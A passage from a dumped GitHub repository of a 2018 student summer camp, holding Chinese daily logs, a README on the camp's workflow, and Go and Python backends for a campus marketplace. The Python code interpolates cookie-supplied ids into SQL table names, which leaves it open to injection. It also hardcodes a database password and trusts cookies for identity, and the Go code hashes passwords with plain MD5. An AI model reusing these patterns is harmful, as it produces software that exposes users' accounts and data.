"UTF-8", "text": "# 7.10日报\n\n感受同 7.11.md\n\n另外下午把CSAPP链接一章看完了\n" }, { "alpha_fraction": 0.5263158082962036, "alphanum_fraction": 0.6842105388641357, "avg_line_length": 5.333333492279053, "blob_id": "e38d1362692e2907b1d83545f89514e05bb3e554", "content_id": "93dfc5bb449e5a3e1ddc38fa3cfc961fc1100596", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 39, "license_type": "no_license", "max_line_length": 8, "num_lines": 3, "path": "/jackwener/日报/7.15.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 7.15日报\n\n把练手项目做完了\n" }, { "alpha_fraction": 0.7335907220840454, "alphanum_fraction": 0.7335907220840454, "avg_line_length": 25, "blob_id": "07b1d12491ac4615f5c28cf0c7a3167783f4b91d", "content_id": "91b774e9872cc45e3c18691a0e8effa5b459d9a1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Go", "length_bytes": 259, "license_type": "no_license", "max_line_length": 84, "num_lines": 10, "path": "/jackwener/server/mall/routers/admin.go", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "package routers\n\nimport (\n\t\"mall/controllers\"\n\t\"github.com/astaxie/beego\"\n)\nfunc init() {\n\tbeego.Router(\"/api/admin/kind\", &controllers.MainController{}, \"post:KindSearch\")\n\tbeego.Router(\"/api/admin/local\", &controllers.MainController{}, \"post:LocalSearch\")\n}" }, { "alpha_fraction": 0.6904761791229248, "alphanum_fraction": 0.761904776096344, "avg_line_length": 7.599999904632568, "blob_id": "746eedf0ebf9ce2c5be2e3d9ea6f5a28a847fec0", "content_id": "664ba71d3b3a9166c1517b0871875cb918141087", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 88, "license_type": "no_license", "max_line_length": 19, "num_lines": 5, "path": "/Old-Li883/日报/7.20.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 7.20\n\n今天看html,css教程\n\n明日计划:看js教程,并尝试写一下前段" }, { "alpha_fraction": 0.6062656044960022, "alphanum_fraction": 0.623709499835968, "avg_line_length": 16.16666603088379, "blob_id": "2bb3f7f4ee25704ee03df62ab9d0be8c59a22e7f", "content_id": "3086eba59300178cb3bec506fce4a900393cbe1d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Go", "length_bytes": 3057, "license_type": "no_license", "max_line_length": 75, "num_lines": 162, "path": "/Shixiaoyanger/market/controllers/goods.go", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "package controllers\n\nimport (\n\t\"fmt\"\n\n\t\"encoding/json\"\n\t\"market/models\"\n\t\"github.com/astaxie/beego\"\n)\n\ntype GoodsController struct{\n\tMainController\n}\ntype SearchBy struct{\n\tTypes string `json:\"types\"` \n\tDetails string `json:\"details\"`\n\t//按类别 // 1 电子设备\n\t//001\t// 2 书籍资料\n\t\t\t// 3 宿舍百货\n\t\t\t// 4 美妆护肤\n\t\t\t// 5 女装\n\t\t\t// 6 男装\n\t\t\t// 7 鞋帽配饰\n\t\t\t// 8 门票卡券\n\t\t\t// 9 其他\n\n\t//按地域 // 1 韵苑\n\t//002\t// 2 沁苑\n\t\t\t// 3 紫菘\n\t\t\t// 4 其他\n}\n\n//查询并返回商品信息\nfunc (this *GoodsController) Search(){\n\tvar op SearchBy\n\terr := json.Unmarshal(this.Ctx.Input.RequestBody,&op)\n\tif err != nil{\n\t\tbeego.Error(err)\n\t}\n\tvar goodsinfo []*models.Goods\n\tfmt.Println(\"dasa\",op.Types,\"jutyht\")\n\tvar ok bool\n\n\tif op.Types ==\"001\"{\n\n\t\tok, goodsinfo = models.SearchByCategory(op.Details)\n\n\t}\n\tif op.Types == \"002\"{\n\n\t\tok, goodsinfo = models.SearchByPosition(op.Details)\n\n\t}\n\tif ok{\n\t\tgoodsstruct :=GoodsStruct{\n\t\t\tGoodsinfo: goodsinfo,\n\t\t}\n\t\tthis.Data[\"json\"] = goodsstruct \n\t\tthis.ServeJSON()\n\n\t}\n}\n//查询单个商品信息//1\nfunc (this *GoodsController) View(){\n\n\tid := this.Ctx.Input.Param(\":id\")\n\tok,goods := models.SearchById(id)\n\tif ok{\n\t\tgoodsstrct := GoodsStruct{\n\t\t\tGoodsinfo: []*models.Goods{&goods},\n\t\t\tStatusCode: sucgoodsinfo,\n\t\t}\n\t\tthis.Data[\"json\"] = goodsstrct\n\t\tthis.ServeJSON()\n\t}\n\t\n\tthis.RetError(errNoGoods)\n\treturn\n}\n//添加商品信息\nfunc (this *GoodsController) Add(){\n\tvar goinfo models.Goods\n\terr0 := json.Unmarshal(this.Ctx.Input.RequestBody,&goinfo)\n\tif err0 != nil{\n\t\tbeego.Error(err0)\n\t}\n\tok, err := models.Addgoods(&goinfo)\n\tif ok{\n\t\tthis.Data[\"json\"] = \"添加成功\"\n\t}else{\n\t\tif err == nil{\n\t\t\tthis.Data[\"json\"] = \"商品名已存在\"\n\t\t}else{\n\t\t\tthis.Data[\"json\"] = \"添加失败\"\n\t\t}\n\t}\n this.ServeJSON()\n}\n\n\nfunc (this *GoodsController) Popular(){\n\n\terr,goods := models.PopularSearch()\n\tif err != nil{\n\t\tbeego.Error(err)\n\t\tthis.RetError(errDatabase2)\n\t\treturn\n\t}\n\tgoodsstrct := GoodsStruct{\n\t\tGoodsinfo: goods , //[]*models.Goods{&goods},\n\t\tStatusCode: sucgoodsinfo,\n\t}\n\tthis.Data[\"json\"] = goodsstrct\n\tthis.ServeJSON()\n\treturn\n\t\n}\nfunc (this *GoodsController) Latest(){\n\n\terr,goods := models.LatestSearch()\n\tif err != nil{\n\t\tbeego.Error(err)\n\t\tthis.RetError(errDatabase2)\n\t\treturn\n\t}\n\tgoodsstrct := GoodsStruct{\n\t\tGoodsinfo: goods , \n\t\tStatusCode: sucgoodsinfo,\n\t}\n\tthis.Data[\"json\"] = goodsstrct\n\tthis.ServeJSON()\n\treturn\n\t\n}\n\n\n\nfunc (this *GoodsController) Test(){\n\tthis.TplName = \"test.html\"\n}\n\n\n\n/*time 操作\n\n\t // 获取当前(当地)时间\n\t t := time.Now()\n\t // 获取0时区时间\n\t t = time.Now().UTC()\n\t fmt.Println(t)\n\t // 获取当前时间戳\n\t timestamp := t.Unix()\n\t fmt.Println(timestamp)\n\t // 获取时区信息\n\t name, offset := t.Zone()\n\t fmt.Println(name, offset)\n\t // 把时间戳转换为时间\n\t currenttime := time.Unix(timestamp+int64(offset), 0)\n\t // 格式化时间\n\t fmt.Println(\"Current time : \", currenttime.Format(\"2006-01-02 15:04:05\"))\n\t\t\n*/\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t" }, { "alpha_fraction": 0.6060991287231445, "alphanum_fraction": 0.6060991287231445, "avg_line_length": 27.722627639770508, "blob_id": "56d0a45d1f33441dce1e9a4a144e2b817e04a027", "content_id": "ccbec38aede50b53c699c4acc545b20c824e8800", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4111, "license_type": "no_license", "max_line_length": 89, "num_lines": 137, "path": "/Old-Li883/mall/views/client_views.py", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "from flask import request\nfrom werkzeug.security import generate_password_hash\nfrom views import app\nfrom model.client import register, find_commodity_addr, find_commodity_cls\nfrom model.client import find_info, modify_info\nfrom model.client import in_shopping_cart, out_shopping_cart, check_shopping_cart\nfrom model.client import in_favourites, out_favourites, check_favourites, check_commodity\nfrom model.client import buy_thing\nfrom model.client import add_addr, modify_addr, check_addr\nfrom model.client import find_message\n\n\[email protected]('/api/client/registration', methods=['post'])\ndef registration():\n \"\"\"\n 注册时除基本信息外还要写清楚收货地址\n \"\"\"\n\n data = request.get_json()\n id = data['id']\n pwd = data['password']\n password = generate_password_hash(pwd)\n email = data['email']\n name = data['name']\n addr = data['addr']\n phone = data['phone']\n return register(id, password, email, name, addr, phone)\n\n\[email protected]('/api/client/commodity/location', methods=['post'])\ndef commodity_location():\n \"\"\"\n 按分类查询商品,用query表名查询方式及类型\n \"\"\"\n\n way = request.args.get('way')\n data = request.get_json()\n name = data['name']\n if way == 'cls':\n return find_commodity_cls(name)\n elif way == 'addr':\n return find_commodity_addr(name)\n\n\[email protected]('/api/client/info', methods=['post', 'get'])\ndef info():\n operate = request.args.get('operate')\n if operate == 'find':\n id = request.cookies.get('id')\n data = request.get_json()\n who = data['who'] # 查自己的还是商家的信息\n return find_info(who, id)\n elif operate == 'modify':\n data = request.get_json()\n id = request.cookies.get(\"id\")\n pwd = data['password']\n password = generate_password_hash(pwd)\n email = data['email']\n return modify_info(id, password, email)\n\n\[email protected]('/api/client/cart', methods=['post', 'get'])\ndef cart():\n operate = request.args.get('operate')\n c_id = request.cookies.get(\"id\")\n if operate == 'in':\n data = request.get_json()\n id = data['id'] # 这里是物品id\n return in_shopping_cart(c_id, id)\n elif operate == 'out':\n data = request.get_json()\n id = data['id'] # 这里是物品id\n return out_shopping_cart(c_id, id)\n elif operate == 'check':\n return check_shopping_cart(c_id)\n\n\[email protected]('/api/client/favourites', methods=['post', 'get'])\ndef favourites():\n \"\"\"\n 所有用户的收藏夹用一个数据库\n 方便后面的查找\n \"\"\"\n\n operate = request.args.get('operate')\n c_id = request.cookies.get(\"id\")\n if operate == 'in':\n data = request.get_json()\n m_id = data['id'] # 这里是物品id\n return in_favourites(c_id, m_id)\n elif operate == 'out':\n data = request.get_json()\n m_id = data['id'] # 这里是物品id\n return out_favourites(c_id, m_id)\n elif operate == 'check':\n return check_favourites(c_id)\n\n\[email protected]('/api/client/commodity')\ndef check_commodity_info():\n c_id = request.cookies.get(\"id\")\n id = request.args.get(\"id\")\n return check_commodity(c_id, id)\n\n\[email protected]('/api/client/buy', methods=['post'])\ndef buy():\n c_id = request.cookies.get(\"id\")\n data = request.get_json()\n id = data['id']\n return buy_thing(c_id, id)\n\n\[email protected]('/api/client/addr', methods=['post', 'get'])\ndef addr():\n c_id = request.cookies.get(\"id\")\n operate = request.args.get('operate')\n if operate == 'add':\n data = request.get_json()\n name = data['name']\n ad = data['ad']\n phone = data['phone']\n return add_addr(c_id, name, ad, phone)\n elif operate == 'modify':\n data = request.get_json()\n name = data['name']\n ad = data['ad']\n phone = data['phone']\n return modify_addr(c_id, name, ad, phone)\n elif operate == 'check':\n check_addr(c_id)\n\n\[email protected]('/api/client/message')\ndef message():\n id = request.cookies.get(\"id\")\n return find_message(id)\n" }, { "alpha_fraction": 0.6615384817123413, "alphanum_fraction": 0.7076923251152039, "avg_line_length": 5, "blob_id": "9d569b77f8e2e15bd77373386ee0a64e34ccdc45", "content_id": "76253085bd3c852cd83e66105986dabe189ddfa3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 133, "license_type": "no_license", "max_line_length": 19, "num_lines": 11, "path": "/Old-Li883/日报/7.15.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 7.15\n\n写热身任务\n\n遇到挺多问题\n\n如:\n\nMySQL中用了%d失败,应该全用%s\n\ncookie设置,获取,删除问题等" }, { "alpha_fraction": 0.7110186815261841, "alphanum_fraction": 0.7214137315750122, "avg_line_length": 23.049999237060547, "blob_id": "56b750dd3a73a463a4516643c9a682e7b76ab533", "content_id": "6ad9e954bc37df59097aee9d0f2c1363fe79d7dd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Go", "length_bytes": 481, "license_type": "no_license", "max_line_length": 54, "num_lines": 20, "path": "/yixiaoer/server/src/project2/main.go", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "package main\n\nimport (\n\t\"github.com/labstack/echo\"\n\t\"project/project2/controller\"\n)\n\nfunc main() {\n\te := echo.New()\n\n\te.POST(\"/login\", controller.Login)\n\te.POST(\"/sign-up\", controller.SignUp)\n\te.POST(\"/page/categories\", controller.ShowCategory)\n\te.POST(\"/page/location\", controller.ShowLocation)\n\te.POST(\"/page/commodities\", controller.CommodityInfo)\n\te.POST(\"/page/popularity\", controller.PopluarRank)\n\te.POST(\"/homepage\",controller.UserInfo)\n\n\te.Logger.Fatal(e.Start(\":8080\"))\n}\n" }, { "alpha_fraction": 0.6179604530334473, "alphanum_fraction": 0.6245560646057129, "avg_line_length": 20.670330047607422, "blob_id": "e42a0c1331037af6ede76813ac28e2e4537afa2b", "content_id": "385340db1c7b37b03e6f95ef1b304a607760f4f7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Go", "length_bytes": 2119, "license_type": "no_license", "max_line_length": 54, "num_lines": 91, "path": "/yixiaoer/server/src/project2/controller/user.go", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "package controller\n\nimport (\n\t\"net/http\"\n\t\"github.com/labstack/echo\"\n\t\"project/project2/model\"\n\t\"time\"\n\t\"crypto/md5\"\n\t\"encoding/hex\"\n)\n\nfunc Login(c echo.Context) error {\n\t//Request(c)\n\tuserInfo := map[string]string{\n\t\t\"name\": \"\",\n\t\t\"password\": \"\",\n\t}\n\tc.Bind(&userInfo)\n\n\th := md5.New()\n\th.Write([]byte(userInfo[\"password\"])) // 需要加密的字符串为密码\n\thas := hex.EncodeToString(h.Sum(nil)) // 输出加密结果\n\tuserInfo[\"password\"] = has\n\n\tvar u map[string]string\n\tif model.Login(userInfo) == 0 { //密码与账户匹配\n\t\tcookie := new(http.Cookie)\n\t\tcookie.Name = \"username\"\n\t\tcookie.Value = userInfo[\"name\"]\n\t\tcookie.Expires = time.Now().Add(24 * time.Hour)\n\t\tc.SetCookie(cookie)\n\n\t\tu = map[string]string{\n\t\t\t\"status\": \"yes\",\n\t\t}\n\t} else if model.Login(userInfo) == 1 { //有name但是pw不匹配\n\t\tu = map[string]string{\n\t\t\t\"status\": \"wrong pw\",\n\t\t}\n\t} else if model.Login(userInfo) == 2 { //没有name\n\t\tu = map[string]string{\n\t\t\t\"status\": \"no user\",\n\t\t}\n\t}\n\treturn c.JSON(http.StatusOK, u)\n}\n\nfunc SignUp(c echo.Context) error {\n\t//Request(c)\n\tuserInfo := map[string]string{\n\t\t//\"id\": \"\",在数据库中会自动分配一个id所以在注册时可以不需要设置id\n\t\t\"password\": \"\",\n\t\t\"email\": \"\",\n\t\t\"phone\": \"\",\n\t\t\"name\": \"\",\n\t}\n\tc.Bind(&userInfo)\n\t//data := []byte(userInfo[\"password\"])\n\t//has := md5.Sum(data)\n\th := md5.New()\n\th.Write([]byte(userInfo[\"password\"])) // 需要加密的字符串为密码\n\thas := hex.EncodeToString(h.Sum(nil)) // 输出加密结果\n\tuserInfo[\"password\"] = has\n\tvar u map[string]string\n\tif model.SignUp(userInfo) == 0 {\n\t\tu = map[string]string{\n\t\t\t\"status\": \"yes\",\n\t\t}\n\t} else if model.SignUp(userInfo) == 1 {\n\t\tu = map[string]string{\n\t\t\t\"status\": \"already have\",\n\t\t}\n\t} else if model.SignUp(userInfo) == 2 {\n\t\tu = map[string]string{\n\t\t\t\"status\": \"incomplete data\",\n\t\t}\n\t}\n\treturn c.JSON(http.StatusOK, u)\n}\n\nfunc UserInfo(c echo.Context)error {\n\tuserInfo := map[string]string{\n\t\t\"name\": \"\",\n\t}\n\tc.Bind(&userInfo)\n\tmodel.UserHits(userInfo)\n\tvar user model.User\n\tuser = model.UserInfo(userInfo)\n\tu := &user\n\treturn c.JSON(http.StatusOK, u)\n}" }, { "alpha_fraction": 0.6910569071769714, "alphanum_fraction": 0.7398374080657959, "avg_line_length": 10.090909004211426, "blob_id": "822e43460314ecdbca2a2796e32b07421e4f9bbb", "content_id": "62411280cc453932d66e09b472e7833dcaf02ba3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 253, "license_type": "no_license", "max_line_length": 25, "num_lines": 11, "path": "/Shixiaoyanger/日报/7.16.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 7.16日报\n\n1.学习了json基本语法\n\n2.学习了beego中如何解析和转化为json格式\n\n 有看了点原生中的语法 有点混淆\n\n3.将热身中的接口重构 今天把路由改完了\n\n 另外在认证的地方加上了session\n\n" }, { "alpha_fraction": 0.6482029557228088, "alphanum_fraction": 0.6528541445732117, "avg_line_length": 21.112150192260742, "blob_id": "b479a66d302fefe484b5caff24451b0cb94fb122", "content_id": "68d8d109131822016394e89ee820ed6f1e0a6630", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Go", "length_bytes": 2539, "license_type": "no_license", "max_line_length": 113, "num_lines": 107, "path": "/jackwener/server/练手/controllers/index.go", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "package controllers\n\nimport (\n\t\"github.com/astaxie/beego\"\n\t\"encoding/json\"\n\t\"fmt\"\n\t\"hello/encryptions\"\n\t\"hello/models\"\n\t\"hello/models/class\"\n\t\"github.com/astaxie/beego/orm\"\n)\n\n\ntype UserController struct {\n\tbeego.Controller\n}\n\nfunc (c *UserController) PageLogin() {\n\terr := c.GetSession(\"userPermission\")\n\tfmt.Print(err)\n\tif err == nil{\n\t\tfmt.Printf(\"没有session\")\n\t\tu := models.Info{}\n\t\tu.Result = false\n\t\tc.Data[\"json\"] = u\n\t\tc.ServeJSON()\n\t\treturn\n\t} else if !strings.Contains(c.GetSession(\"userPermission\").(string), \"admin\") {\n\t\tfmt.Printf(c.GetSession(\"userPermission\").(string))\n\t\tfmt.Printf(\"没权限\")\n\t\tu := models.Info{}\n\t\tu.Result = false\n\t\tc.Data[\"json\"] = u\n\t\tc.ServeJSON()\n\t\treturn\n\t} else {\n\t\tfmt.Printf(c.GetSession(\"userPermission\").(string))\n\t\tfmt.Printf(\"有权限\")\n\t\tu := models.Info{}\n\t\tu.Result = true\n\t\tc.Data[\"json\"] = u\n\t\tc.ServeJSON()\n\t}\n}\n\n//通过路由\"/\",发送post请求,默认Json数据中User[0]的Name,Password为发送的信息值,返回的Json数据中Result:false与true说明了登录情况\nfunc (c *UserController) Login() {\n\tvar ob models.Info\n\tjson.Unmarshal(c.Ctx.Input.RequestBody, &ob)\n\tname := ob.User[0].Name\n\tpwd := ob.User[0].Password\n\tpassword := encryptions.Salt(pwd)//MD5加盐加密\n\tu := class.User{}\n\tfmt.Print(u)\n\to := orm.NewOrm()\n\terr := o.QueryTable(\"user\").Exclude(\"status\", \"apply\").Filter(\"name\", name).Filter(\"password\", password).One(&u)\n\tpermission := u.Status\n\t//var str string = strconv.Itoa(id)\n\tif err == nil {\n\t\tfmt.Println(err)\n\t\tu := models.Info{}\n\t\tu.Result = true\n\t\tc.Data[\"json\"] = u\n\t\tc.ServeJSON()\n\t\tc.SetSession(\"userPermission\", permission)\n\t\tfmt.Print(\"设置了\")\n\t\treturn\n\t} else {\n\t\tu := models.Info{}\n\t\tu.Result = false\n\t\tc.Data[\"json\"] = u\n\t\tc.ServeJSON()\n\t}\n}\n\n//通过路由\"/\",发送post请求,默认Json数据中User[0]的Name,Password为发送的信息值,注册成功/失败Json中result相应为true/false\nfunc (c *UserController) Register() {\n\tvar ob models.Info\n\tjson.Unmarshal(c.Ctx.Input.RequestBody, &ob)\n\tfmt.Print(ob)\n\n\tu := class.User{\n\t\tName: ob.User[0].Name,\n\t\tPassword: encryptions.Salt(ob.User[0].Password),\n\t\tNickname: ob.User[0].Nickname,\n\t\tEmail: ob.User[0].Email,\n\t\tPhone : ob.User[0].Phone,\n\t\tGroup : ob.User[0].Group,\n\t\tStatus : \"apply\",\n\t}\n\tfmt.Print(u)\n\terr := u.Create()\n\tif err == nil {\n\t\tfmt.Println(err)\n\t\tu := models.Info{}\n\t\tu.Result = true\n\t\tc.Data[\"json\"] = u\n\t\tc.ServeJSON()\n\t\treturn\n\t} else {\n\t\tu := models.Info{}\n\t\tu.Result = false\n\t\tc.Data[\"json\"] = u\n\t\tc.ServeJSON()\n\t\treturn\n\t}\n}" }, { "alpha_fraction": 0.5298831462860107, "alphanum_fraction": 0.545742928981781, "avg_line_length": 25.860986709594727, "blob_id": "b075285e96b9f7f582f1e39387cbcfb68af1f4d9", "content_id": "ed9ac4df4fee671eb26e8fafe6d32169cdb2cf71", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6416, "license_type": "no_license", "max_line_length": 81, "num_lines": 223, "path": "/Old-Li883/mall/model/client.py", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "\"\"\"\n客户的操作\n注册\n增加name,addr,phone作为收件地址 数据库未建立\n可以按类,地址找物品#此数据库已建立,物品数据库\n查看自己和商家的信息,修改自己信息\n将东西装进购物车,移除购物车,查看购物车 数据库未建立\n收藏页面,取消收藏,查看收藏 数据库未建立\n记录商品浏览记录 数据库未建立\n\"\"\"\n\nfrom util.response import response\nimport pymysql\n\ndb = pymysql.connect(\n host=\"127.0.0.1\", user=\"root\", db=\"mall\", passwd=',lch980929')\ncursor = db.cursor()\n\n\ndef register(id, password, email, name, addr, phone):\n # 前面忘记创建浏览记录表\n cursor.execute(\"select * from client where id=%s\", id)\n if cursor.fetchone() == (None):\n cursor.execute(\n \"insert into client(id,password,email,identify) values(%s,%s,%s,%s)\",\n (\n id,\n password,\n email,\n 0,\n ))\n cursor.execute(\n \"create table info%s\" % id +\n \"(name VARCHAR(20),addr VARCHAR(100),phone VARCHAR(20))\")\n cursor.execute(\n \"insert into info%s\" % id + \"(name,addr,phone) values(%s,%s,%s)\", (\n name,\n addr,\n phone,\n ))\n cursor.execute(\n \"create table cart%s\" % id + \"(id VARCHAR(20))\") # 创建一个用户的购物车\n cursor.execute(\n \"create table browse%s\" % id +\n \"(c_id VARCHAR(20),id VARCHAR(20),num int(10),cls VARCHAR(20))\"\n ) # 创建一个用户浏览记录\n cursor.execute(\"create table message%s\" % id +\n \"(message VARCHAR(50))\") # 创建用户消息记录盒子\n db.commit()\n return response(200)\n else:\n return response(400, \"id has been used\")\n\n\ndef find_commodity_addr(name):\n \"\"\"\n 按地域查找所有商品\n 先找到该地狱下的商家\n 再找到该商家下的所有商品\n \"\"\"\n cursor.execute(\"select id from merchant where addr=%s\", name)\n merchant = []\n for p in cursor.fetchall():\n merchant.append(p)\n commodity = []\n for p in merchant:\n cursor.execute(\"select * from commodity where merchant_id=%s\", p)\n for t in cursor.fetchall():\n commodity.append(t)\n return response(200, commodity)\n\n\ndef find_commodity_cls(name):\n cursor.execute(\"select * from commodity where cls=%s\", name)\n commodity = []\n for t in cursor.fetchall():\n commodity.append(t)\n return response(200, commodity)\n\n\ndef find_info(who, id):\n cursor.execute(\"select * from %s\" % who + \" where id=%s\", (id, ))\n data = cursor.fetchone()\n return response(200, list(data))\n\n\ndef modify_info(id, password, email):\n cursor.execute(\"update client set password=%s,email=%s\", (\n password,\n email,\n ))\n db.commit()\n return response(200)\n\n\ndef in_shopping_cart(c_id, id):\n cursor.execute(\"insert into cart%s\" % c_id + \"(id) values(%s)\", (id, ))\n db.commit()\n return response(200)\n\n\ndef out_shopping_cart(c_id, id):\n cursor.execute(\"delete from cart%s\" % c_id + \" where id=%s\", (id, ))\n db.commit()\n return response(200)\n\n\ndef check_shopping_cart(c_id):\n cursor.execute(\"select * from cart%s\" % c_id)\n id = []\n for i in cursor.fetchall():\n id.append(i[0])\n return response(200, id)\n\n\ndef in_favourites(c_id, m_id):\n cursor.execute(\"insert into favourites(c_id,m_id) values(%s,%s)\", (\n c_id,\n m_id,\n ))\n db.commit()\n return response(200)\n\n\ndef out_favourites(c_id, m_id):\n cursor.execute(\"delete from favourites where c_id=%s and m_id=%s\", (\n c_id,\n m_id,\n ))\n db.commit()\n return response(200)\n\n\ndef check_favourites(c_id):\n cursor.execute(\"select m_id from favourites where c_id=%s\", c_id)\n data = []\n for i in cursor.fetchall():\n data.append(i[0])\n return response(200, data)\n\n\ndef check_commodity(c_id, id):\n cursor.execute(\"select * from commodity where id=%s\", id)\n data = cursor.fetchone()\n if data != (None):\n cursor.execute(\"select num from browse%s\" % c_id + \" where id=%s\",\n (id, ))\n num = cursor.fetchone()\n cursor.execute(\"select cls from commodity where id=%s\", (id, ))\n clss = cursor.fetchone()\n if num == (None): # 添加浏览记录\n cursor.execute(\n \"insert into browse%s\" % c_id +\n \"(c_id,id,num,cls) values(%s,%s,1,%s)\", (c_id, id, clss[0]))\n else:\n n = num[0]\n n += 1\n cursor.execute(\n \"update browse%s\" % c_id + \" set num=%s where id=%s\", (\n n,\n id,\n ))\n db.commit()\n return response(200)\n else:\n return response(400, \"This commodity has not exist\")\n\n\ndef buy_thing(c_id, id): # 商品从购物车消失,商家库存-1\n cursor.execute(\"select * from cart%s\" % c_id + \" where id=%s\", (id, ))\n data = cursor.fetchone()\n if data == (None):\n return response(400,\n \"please put this commodity into you shopping cart\")\n else:\n cursor.execute(\"delete from cart%s\" % c_id + \" where id=%s\", (id, ))\n cursor.execute(\"select commodity_rest from commodity where id=%s\", id)\n rest = cursor.fetchone()\n r = rest[0]\n r -= 1\n cursor.execute(\"update commodity set commodity_rest=%s where id=%s\", (\n r,\n id,\n ))\n db.commit()\n return response(200)\n\n\ndef add_addr(c_id, name, ad, phone):\n cursor.execute(\n \"insert into info%s\" % c_id + \"(name,addr,phone) values(%s,%s,%s)\", (\n name,\n ad,\n phone,\n ))\n db.commit()\n return response(200)\n\n\ndef modify_addr(c_id, name, ad, phone):\n cursor.execute(\"update info%s\" % c_id + \" set name=%s,addr=%s,phone=%s\", (\n name,\n ad,\n phone,\n ))\n db.commit()\n return response(200)\n\n\ndef check_addr(c_id):\n cursor.execute(\"select * from info%s\", c_id)\n data = []\n for i in cursor.fetchall():\n data.append(i)\n return response(200, data)\n\n\ndef find_message(id):\n cursor.execute(\"select * from message%s\" % id)\n data = []\n for i in cursor.fetchall():\n data.append(i)\n return response(200, data)\n" }, { "alpha_fraction": 0.6240713000297546, "alphanum_fraction": 0.6285289525985718, "avg_line_length": 15.341463088989258, "blob_id": "fa690cb2bb699c1b4cb29b3d567a53ad6027954c", "content_id": "4dee845ada61abd1302d36eef2162f93e61c0c87", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Go", "length_bytes": 761, "license_type": "no_license", "max_line_length": 55, "num_lines": 41, "path": "/jackwener/server/练手/models/class/users.go", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "package class\n\nimport (\n\t\"fmt\"\n\t\"github.com/astaxie/beego/orm\"\n)\n\n// 完成User类型定义\ntype User struct {\n\tId int `orm:\"pk\"` // 设置为主键,字段Id, Password首字母必须大写\n\tName string\n\tPassword string\n\tNickname string\n\tEmail string\n\tPhone string\n\tGroup string\n\tStatus string //管理员状态为1,普通用户状态为0,注册未认证用户状态为2\n}\n\n\n\nfunc (u *User) ReadDB() (err error) {\n\to := orm.NewOrm()\n\tfmt.Println(*u)\n\terr = o.Read(u, \"name\", \"password\")\n\treturn err\n}\n\nfunc (u *User) Create() (err error) {\n\to := orm.NewOrm()\n\tfmt.Println(\"Create success!\")\n\tfmt.Println(*u)\n\t_, _ = o.Insert(u)\n\treturn err\n}\n\nfunc (u *User) Update() (err error) {\n\to := orm.NewOrm()\n\t_, err = o.Update(u)\n\treturn err\n}\n\n\n\n" }, { "alpha_fraction": 0.6693313717842102, "alphanum_fraction": 0.6970688104629517, "avg_line_length": 15.062256813049316, "blob_id": "308fe00828935c2ef32f088a95ebd1e21a423b2b", "content_id": "a5ecc627096ab8443b89ab8cc24b951d808c2277", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 14430, "license_type": "no_license", "max_line_length": 163, "num_lines": 514, "path": "/README.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 2018 冰岩程序组夏令营\n\n### 前言:\n\n+ 不会的话先 Google ,搜索完之后还是没有解决再来问我们\n\n+ 第一天先 fork 仓库:[bingyan-summer-camp2018](https://github.com/tofar/bingyan-summer-camp2018),本次夏令营要求代码,日报周报等全部托管在 你们 fork 之后的 github 仓库上\n\n 日报、周报不需要太多,只需要介绍每天学习了什么即可\n\n+ 之后的 code review,采用 PR --> MR 的形式\n\n 当你需要代码写了一部分的时候,可以向你们fork的仓库提交 pull request,我们会审核代码,如果有点问题,会附上建议,你们修改好之后我们再将你们的 PR merge 进我们仓库\n\n+ 在夏令营开始的时候会给你们每人分配一个合适的导师\n\n+ 我们每周一次组内分享,欢迎新人做分享\n\n+ 没做完,可以夏令营结束之后继续写,欢迎来问我们\n\n+ 坚持就是胜利,我希望你们在最后还能保持着刚刚进来的热情,很多事情没有你想象的那么难,当然也没有你想象的那么简单,但是很难的事情也是一步一步做完的,希望冰岩夏令营能成为你成为你大学的一个契机、一个跳板。加油!\n\n### 操作说明:\n\n- 首先 fork [此仓库](https://github.com/tofar/bingyan-summer-camp2018)\n\n- 在你的仓库操作的时候请不要对他人目录进行任何操作\n\n- 你的操作权限仅限于你的目录,目录名字为你的 githubID,若仓库中没有你的目录请自行创建\n\n- 提交 PR 的时候自行查看是否存在代码冲突,如果存在自行解决之后再提交 PR\n\n- 提交 PR 是提交到 dev 分支,不是 master 分支\n\n- 提交之后最好跟导师说一声,让导师及时检查\n\n- 目录结构推荐如下:\n\n + README.md\n 必须注明相关开发环境,以及一些特殊说明\n + .gitignore\n 忽略一些不需要的文件\n + client\n 前端代码,如果不用webpack之类的打包的话,直接一个 dist 文件夹即可\n + dist\n 编译打包后的文件目录\n + index.html\n + css\n + js\n + src\n 源码\n + server\n 服务端代码\n + src\n 源码\n\n## 